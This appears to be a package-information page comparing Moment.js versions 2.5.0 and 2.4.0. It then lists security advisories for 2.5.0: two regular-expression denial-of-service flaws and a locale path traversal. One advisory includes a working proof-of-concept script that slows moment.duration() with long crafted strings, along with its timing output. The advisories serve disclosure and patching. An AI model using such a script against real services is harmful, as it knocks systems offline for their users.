Moment.js version 2.5.0 refines the popular JavaScript date manipulation library, building upon the foundation laid by version 2.4.0. Both versions offer robust capabilities for parsing, validating, manipulating, and formatting dates and times within web browsers and Node.js environments, making them essential tools for developers handling date-related logic. The author remains the same, Iskren Ivov Chernev.
While the core functionalities largely remain consistent, moving from 2.4.0 to 2.5.0 introduces subtle improvements and potential bug fixes. The shift focuses more on internal enhancements and stability rather than groundbreaking new features. Developers who have extensively used 2.4.0 will find a familiar API, reducing the learning curve when upgrading. Both rely on similar development dependencies like Grunt, Nodeunit, and Uglify-js, which are related with testing, concatenating and minifying the javascript files.
The crucial difference lies in the release date; version 2.5.0 was released on December 23, 2013, while version 2.4.0 was released on October 27, 2013. This temporal gap suggests bug fixes, performance optimizations, or minor feature additions implemented in response to community feedback or identified issues. For developers choosing between the two, opting for the newer 2.5.0 is generally recommended to inherit these refinements and ensure access to the most up-to-date and stable iteration of the library. Both distributions are accesible through npm, in this case using the tarball urls provided.
All the vulnerabilities related to the version 2.5.0 of the package
Regular Expression Denial of Service in moment
Versions of moment prior to 2.11.2 are affected by a regular expression denial of service vulnerability. The vulnerability is triggered when arbitrary user input is passed into moment.duration().
var moment = require('moment');
var genstr = function (len, chr) {
var result = "";
for (i=0; i<=len; i++) {
result = result + chr;
}
return result;
}
for (i=20000;i<=10000000;i=i+10000) {
console.log("COUNT: " + i);
var str = '-' + genstr(i, '1')
console.log("LENGTH: " + str.length);
var start = process.hrtime();
moment.duration(str)
var end = process.hrtime(start);
console.log(end);
}
$ node moment.js
COUNT: 20000
LENGTH: 20002
[ 0, 618931029 ]
COUNT: 30001
LENGTH: 30003
[ 1, 401413894 ]
COUNT: 40002
LENGTH: 40004
[ 2, 437075303 ]
COUNT: 50003
LENGTH: 50005
[ 3, 824664804 ]
COUNT: 60004
LENGTH: 60006
[ 5, 651335262 ]
Please update to version 2.11.2 or later.
Regular Expression Denial of Service in moment
Affected versions of moment are vulnerable to a low severity regular expression denial of service when parsing dates as strings.
Update to version 2.19.3 or later.
Path Traversal: 'dir/../../filename' in moment.locale
This vulnerability impacts npm (server) users of moment.js, especially if user provided locale string, eg fr is directly used to switch moment locale.
This problem is patched in 2.29.2, and the patch can be applied to all affected versions (from 1.0.1 up until 2.29.1, inclusive).
Sanitize user-provided locale name before passing it to moment.js.
Are there any links users can visit to find out more?
If you have any questions or comments about this advisory: